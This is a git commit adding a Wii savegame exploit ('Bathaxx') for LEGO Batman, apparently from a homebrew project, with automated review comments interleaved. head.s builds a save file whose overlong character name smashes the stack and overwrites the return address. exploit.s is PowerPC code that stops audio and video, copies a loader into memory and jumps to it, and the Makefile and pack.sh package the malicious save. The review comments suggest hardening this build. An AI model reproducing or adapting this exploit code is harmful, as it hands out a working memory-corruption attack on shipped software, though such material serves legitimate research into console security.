From: Bernhard Urban
Date: Sun, 2 Jan 2011 05:46:51 +0000 (+0100)
Subject: LEGO Batman^H^H^Hhaxx
X-Git-Url: http://wien.tomnetworks.com/gitweb/?p=savezelda.git;a=commitdiff_plain;h=da886e2a723e5990d209d8fc141dc9bab7bf0424;ds=sidebyside
LEGO Batman^H^H^Hhaxx
---
diff --git a/Makefile b/Makefile
index a5a5120..d9920c0 100644
--- a/Makefile
+++ b/Makefile
@@ -52,6 +52,7 @@ all: FORCE .version
$(Q)$(MAKE) -C loader
$(Q)$(MAKE) -C twilight
$(Q)$(MAKE) -C lego
+ $(Q)$(MAKE) -C batman
FORCE:
@@ -60,3 +61,4 @@ clean:
$(MAKE) -C loader clean
$(MAKE) -C twilight clean
$(MAKE) -C lego clean
+ $(MAKE) -C batman clean
diff --git a/batman/.gitignore b/batman/.gitignore
new file mode 100644
index 0000000..bcb0659
--- /dev/null
+++ b/batman/.gitignore
@@ -0,0 +1 @@
+FILE_V28
diff --git a/batman/Makefile b/batman/Makefile
new file mode 100644
index 0000000..af58778
--- /dev/null
+++ b/batman/Makefile
@@ -0,0 +1,116 @@
+# Copyright 2008-2009 Segher Boessenkool
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= broadway-
+
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= $(HOME)/wii/segher
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+ CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+ LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+ Q :=
+else
+ Q := @
+ MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := rlbp.bin rlbj.bin rlbe.bin
+
+ppms := $(targets:%.bin=%-icon.ppm) rlb-banner.ppm
+assets := title.bin $(ppms)
+
+loader := ../loader/loader.bin
+
+
+titleid = $(shell perl titleid.pl $(1))
+
+
+define twintig
+ D=$(call titleid,$(1)); \
+ $(TOOLS)/twintig $$D $@ toc-$1
+endef
+
+
+all: $(targets)
+
+$(targets): %.bin: toc-% FILE_V28 $(assets)
+ @echo " TWINTIG $@"
+ $(Q)$(call twintig,$*)
+
+FILE_V28: head.bin exploit.bin $(loader)
+ @echo " LEGOSTACK $@"
+ $(Q)./pack.sh $@ $^
+ $(Q)$(TOOLS)/lego-cksum $@
+
+head.bin: head.elf
+ @echo " OBJCOPY $@"
+ $(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.bin: exploit.elf
+ @echo " OBJCOPY $@"
+ $(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.elf: lego.lds exploit.o
+ @echo " LINK $@"
+ $(Q)$(LD) -T $^ -o $@
+
+head.elf: head.o
+ @echo " LINK $@"
+ $(Q)$(LD) -e 0 $< -o $@
+
+exploit.o: exploit.s
+ @echo " ASSEMBLE $@"
+ $(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+head.o: head.s head.b
+ @echo " ASSEMBLE $@"
+ $(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+title.bin: ../.version
+ @echo " TITLEBIN $@"
+ $(Q)perl make-title-bin.pl > $@
+
+../.version: FORCE
+ $(Q)$(MAKE) -C .. .version
+
+$(ppms): %.ppm: %.png
+ @echo " PPM $@"
+ $(Q)convert $< $@
+
+$(loader): FORCE
+ $(Q)$(MAKE) -C ../loader
+
+FORCE:
+
+clean:
+ -rm -f $(targets) FILE_V28
+ -rm -f exploit.bin exploit.elf exploit.o
+ -rm -f head.bin head.elf head.o
+ -rm -f title.bin
diff --git a/batman/exploit.s b/batman/exploit.s
new file mode 100644
index 0000000..ced2134
--- /dev/null
+++ b/batman/exploit.s
@@ -0,0 +1,45 @@
+# Copyright 2008-2009 Segher Boessenkool
+# Copyright 2011 Bernhard Urban
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+ .section .start,"ax"
+ retadr = 0x90394140
+
+ # The return addr for the nintendo loader is a bit different as for 3rd
+ # party loaders. In fact, it depends which value is set by the apploader at
+ # 0x8000002c:
+ # - 0x0: return address is 0x90394140 (some 3rd party loader, e.g. gecko os)
+ # - 0x23: return address is 0x90394000 (set by the sysmenu loader by nintendo)
+ # 0B ver: 0x90394100
+ # to make both work, we insert some no op's here
+ .fill (0x140/0x4), 4, 0x60000000
+
+start:
+ # Set up a stack frame.
+ lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+
+ # Stop audio and video.
+ lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
+ lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
+
+ # Move code into place; a generous 32kB, starting at 64kB in
+ # the save file.
+
+ lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+ lis 4,(retadr-4)@h ; ori 4,4,(retadr-4)@l
+ # Calculate proper offset for the loader in memory
+0: lbzu 0,4(4); cmpwi 0,0x60 ; beq 0b
+ addi 4,4,-4; addi 4,4,end-start
+
+ li 0,0x2000 ; mtctr 0
+0: lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
+
+ # Sync caches on it.
+ li 0,0x0400 ; mtctr 0 ; mr 5,3
+0: dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
+ sync ; isync
+
+ # Go for it!
+ mtctr 3 ; bctr
+end:
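Review bot: The `FILE_V28` recipe never checks that its inputs fit the layout the exploit relies on: `pack.sh` cuts the concatenation at 128 KiB with `dd count=128`, and, as far as exploit.s shows, its copy loop moves a fixed 0x2000 words (32 KiB) starting right after its own `end:`, which is where `$(loader)` lands in the packed file, so a `loader.bin` over 32 KiB builds without any error and boots truncated. I'd add a guard before `./pack.sh`: `$(Q)test $$(wc -c < $(loader)) -le 32768 || { echo "$(loader) exceeds the 32 KiB window exploit.s copies" >&2; exit 1; }`. The same recipe lets `lego-cksum` rewrite `$@` in place as its last step, so if that tool is missing or fails an un-checksummed `FILE_V28` is left behind and is newer than its prerequisites; `.DELETE_ON_ERROR:` (and `.PHONY: all clean`) next to the `FORCE:` rule would close that. A one-line comment on `FILE_V28:` stating the intended layout (64 KiB head.bin, then exploit.bin, then loader.bin, zero-padded to 128 KiB) would also make these limits visible to whoever next touches the loader.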
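Review bot: The constants that define the 32 KiB copy window are written independently — `li 0,0x2000` (words copied), `li 0,0x0400` together with `addi 5,5,0x20` (cache lines flushed), and the `0x60` byte the sled scan compares against, which is the high byte of the `0x60000000` nop in the `.fill` above — so changing one without the others silently breaks either the copy or the flush. I'd define them once next to `retadr` and derive the rest, as sketched below. The `lbzu` loop also deserves a comment saying it walks forward from `retadr` over the nop sled to find where `start` actually landed for this loader, and that it therefore assumes the first byte of `start` (`lis 1,...`, 0x3c) is never 0x60; the comment block above explains the loader variants but not this mechanism. The "Move code into place" comment should state that 32 KiB are copied from `end` unconditionally, i.e. whatever follows the exploit in the save must fit in that window.
```asm
 .section .start,"ax"
 retadr = 0x90394140
 copy_words = 0x2000          # 32 KiB window moved to main
 nop = 0x60000000             # sled filler; the scan below keys on its high byte
# … unchanged: loader-variant comment …
 .fill (0x140/0x4), 4, nop
# … unchanged: start:, stack frame, audio/video stop, address setup …
0: lbzu 0,4(4); cmpwi 0,nop>>24 ; beq 0b
# … unchanged: offset fix-up …
 li 0,copy_words ; mtctr 0
# … unchanged: copy loop …
 li 0,(copy_words*4)/0x20 ; mtctr 0 ; mr 5,3
```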
diff --git a/batman/head.b b/batman/head.b
new file mode 100644
index 0000000..7ed47c7
Binary files /dev/null and b/batman/head.b differ
diff --git a/batman/head.s b/batman/head.s
new file mode 100644
index 0000000..aa5081a
--- /dev/null
+++ b/batman/head.s
@@ -0,0 +1,31 @@
+# Copyright 2011 Bernhard Urban
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+ retadr = 0x90394140
+0:
+ # stolen from some savegame found in teh intertube
+ .incbin "head.b"
+
+ # give the char a name
+ .ascii "you won't see this " # len = 0x14
+
+ # smash it \o/ 0x1f0+0x4 bytes all in all...
+ .fill (0xf4/4), 4, 0x11111111
+
+ # unlock the character (somewhere here actually...)
+ .fill (0x10/4), 4, 0x90c10104
+
+ # add more padding...
+ .fill (0xdc/4), 4, 0x11111111
+
+ # now we at the actual vuln return address
+ # just point to the loader of the loader (= content of exploit.s)
+ .long retadr
+
+ # alternatively you can put the code here too and jump into the stack,
+ # however then you have to take care for nullbytes in the resulting
+ # bytecode, which is a way too tedious. so we just take the further slot for
+ # it :-) (LEGO devs are nice ppl, heh)
+
+ .fill 0x10000 - (. - 0b)
diff --git a/batman/lego.lds b/batman/lego.lds
new file mode 100644
index 0000000..30d4a0a
--- /dev/null
+++ b/batman/lego.lds
@@ -0,0 +1,22 @@
+/* Copyright 2008-2009 Segher Boessenkool
+ This code is licensed to you under the terms of the GNU GPL, version 2;
+ see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+ audio_stop = 0x8009cfa0;
+ video_stop = 0x800ab190;
+
+ main = 0x90000020;
+
+ .twilight 0x90394000:
+ {
+ rlb*.o(.start)
+ *(.text)
+ *(.rodata .rodata.*)
+ *(.data)
+ *(.bss)
+ }
+}
diff --git a/batman/make-title-bin.pl b/batman/make-title-bin.pl
new file mode 100755
index 0000000..639905d
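Review bot: `retadr = 0x90394140` is defined here and again, independently, in exploit.s, and the two must agree (this file writes it into the smashed return slot, exploit.s scans forward from it), so editing one file silently breaks the other — keep a single definition, e.g. `.include "retadr.inc"` in both files or `--defsym retadr=0x90394140` passed from the Makefile. Because `head.b` is an opaque blob "found in teh intertube", the offset at which `.long retadr` lands depends entirely on its length; I'd pin that offset once, with the value recorded from a known-good build, as `.if (. - 0b) != <recorded offset>` / `.error "return slot moved"` / `.endif` right before `.long retadr`, so a re-extracted or different head.b fails to assemble instead of overwriting the wrong word. The closing `.fill 0x10000 - (. - 0b)` already rejects an oversized head.b (a negative count is an assembly error), which is worth saying in its comment. Finally, the comment on the `0x90c10104` fill should say whether that word is an address or a flag value and how it was found; if that is unknown, say so rather than "somewhere here actually".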
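Review bot: The input-section pattern `rlb*.o(.start)` matches nothing this build links: batman/Makefile links `exploit.elf` from `lego.lds exploit.o` only, so exploit.o's `.start` section is an orphan that ld places by its own orphan-section rules rather than at the head of `.twilight`. As far as I can tell it works only because `.twilight` gets no other input and the orphan ends up at the same address; change the line to `exploit.o(.start)` (or `*(.start)`) so the placement is explicit, and add `ASSERT(start == 0x90394000 + 0x140, "nop sled moved")` or similar if the sled really must begin at `0x90394000` for the loader variants exploit.s lists. The pattern looks inherited from the twilight build and deserves a note if it is kept on purpose. The `audio_stop`, `video_stop` and `main` absolute addresses carry no comment saying which LEGO Batman build they were taken from or what lives there, which makes the file impossible to audit — one line each would do.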
--- /dev/null
+++ b/batman/make-title-bin.pl
@@ -0,0 +1,16 @@
+#!/usr/bin/perl
+sub printline {
+ my $x = shift;
+ chomp $x;
+ $x .= "\0" x 32;
+ $x = substr $x, 0, 32;
+ $x =~ s/(.)/\0$1/g;
+
+ print $x;
+}
+
+$name = '"Bathaxx" by lewurm';
+$version = `cat ../.version`;
+
+printline $name;
+printline $version;
diff --git a/batman/pack.sh b/batman/pack.sh
new file mode 100755
index 0000000..57a388b
--- /dev/null
+++ b/batman/pack.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+TARGET=$1; shift
+cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET
diff --git a/batman/rlb-banner.png b/batman/rlb-banner.png
new file mode 100644
index 0000000..ae1ed0c
Binary files /dev/null and b/batman/rlb-banner.png differ
diff --git a/batman/rlb-banner.ppm b/batman/rlb-banner.ppm
new file mode 100644
index 0000000..deee310
Binary files /dev/null and b/batman/rlb-banner.ppm differ
diff --git a/batman/rlbe-icon.png b/batman/rlbe-icon.png
new file mode 100644
index 0000000..ea4caef
Binary files /dev/null and b/batman/rlbe-icon.png differ
diff --git a/batman/rlbe-icon.ppm b/batman/rlbe-icon.ppm
new file mode 100644
index 0000000..77384ee
Binary files /dev/null and b/batman/rlbe-icon.ppm differ
diff --git a/batman/rlbj-icon.png b/batman/rlbj-icon.png
new file mode 100644
index 0000000..360f78c
Binary files /dev/null and b/batman/rlbj-icon.png differ
diff --git a/batman/rlbj-icon.ppm b/batman/rlbj-icon.ppm
new file mode 100644
index 0000000..8d01aa8
Binary files /dev/null and b/batman/rlbj-icon.ppm differ
diff --git a/batman/rlbp-icon.png b/batman/rlbp-icon.png
new file mode 100644
index 0000000..d63aa3d
Binary files /dev/null and b/batman/rlbp-icon.png differ
diff --git a/batman/rlbp-icon.ppm b/batman/rlbp-icon.ppm
new file mode 100644
index 0000000..1cb01f8
Binary files /dev/null and b/batman/rlbp-icon.ppm differ
diff --git a/batman/titleid.pl b/batman/titleid.pl
new file mode 100755
index 0000000..f735f1d
--- /dev/null
+++ b/batman/titleid.pl
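Review bot: The version line comes from a backtick `cat ../.version` whose failure (missing file, non-zero exit) leaves `$version` empty and is never reported, so title.bin would silently be built with a blank second line; read the file in Perl and fail loudly — `open(my $fh, '<', '../.version') or die "../.version: $!"; my $version = <$fh>;` — and put `use strict; use warnings;` under the shebang (both globals are then declared with `my`). `printline` widens every byte with `s/(.)/\0$1/g`, which is only correct for ASCII input; since both strings are under the author's control that is fine, but a comment above the sub should say so, e.g. "emit one 32-character line, NUL-padded, with each byte zero-extended to 16 bits (ASCII only)" — I am inferring the 16-bit format from the zero interleave, so confirm against what twintig expects for title.bin.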
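Review bot: `cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null` leaves the input paths unquoted and word-split, and cannot fail on bad input: `dd` stops at 128 KiB and discards both the excess and its own stderr, and only dd's exit status reaches the caller, so an oversized or missing input still yields a "successful" FILE_V28. I would keep the dd line (deliberately without `pipefail`, because `cat` reading `/dev/zero` is meant to be killed by SIGPIPE once dd has its 128 KiB) but add `set -eu`, quote `"$@"`, and refuse inputs that would be cut off, as below. A comment stating the fixed 128 KiB output size and that the tail is zero-filled would document the layout the exploit depends on.
```shell
#!/bin/bash
set -eu
TARGET=$1; shift
# FILE_V28 is exactly 128 KiB, zero-padded; refuse anything dd would silently cut off
size=$(cat "$@" | wc -c)
[ "$size" -le 131072 ] || { echo "pack.sh: inputs are $size bytes, limit is 131072" >&2; exit 1; }
cat "$@" /dev/zero | dd bs=1024 count=128 2>/dev/null > "$TARGET"
```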
@@ -0,0 +1,2 @@
+#!/usr/bin/perl
+print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];
diff --git a/batman/toc-rlbe b/batman/toc-rlbe
new file mode 100644
index 0000000..5437490
--- /dev/null
+++ b/batman/toc-rlbe
@@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbe-icon.ppm
+FILE_V28 FILE_V28
diff --git a/batman/toc-rlbj b/batman/toc-rlbj
new file mode 100644
index 0000000..fbd0a8a
--- /dev/null
+++ b/batman/toc-rlbj
@@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbj-icon.ppm
+FILE_V28 FILE_V28
diff --git a/batman/toc-rlbp b/batman/toc-rlbp
new file mode 100644
index 0000000..285e9ed
--- /dev/null
+++ b/batman/toc-rlbp
@@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbp-icon.ppm
+FILE_V28 FILE_V28
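Review bot: The script validates nothing: a missing or wrong-length `$ARGV[0]` produces a short title id that the Makefile's `titleid` macro hands straight to twintig, and `ord uc` relies on the implicit `$_` inside the map, which is correct but easy to misread. Every caller passes a four-character game id (`rlbp`, `rlbj`, `rlbe` from the `%` stem), and the output looks meant to be the 16-hex-digit id `00010000` followed by the hex of the upper-cased id, so add `die "usage: titleid.pl <4-char game id>\n" unless @ARGV == 1 && length($ARGV[0]) == 4;` before the print and write `ord uc $_`. A one-line comment stating that output format would make the file self-explanatory.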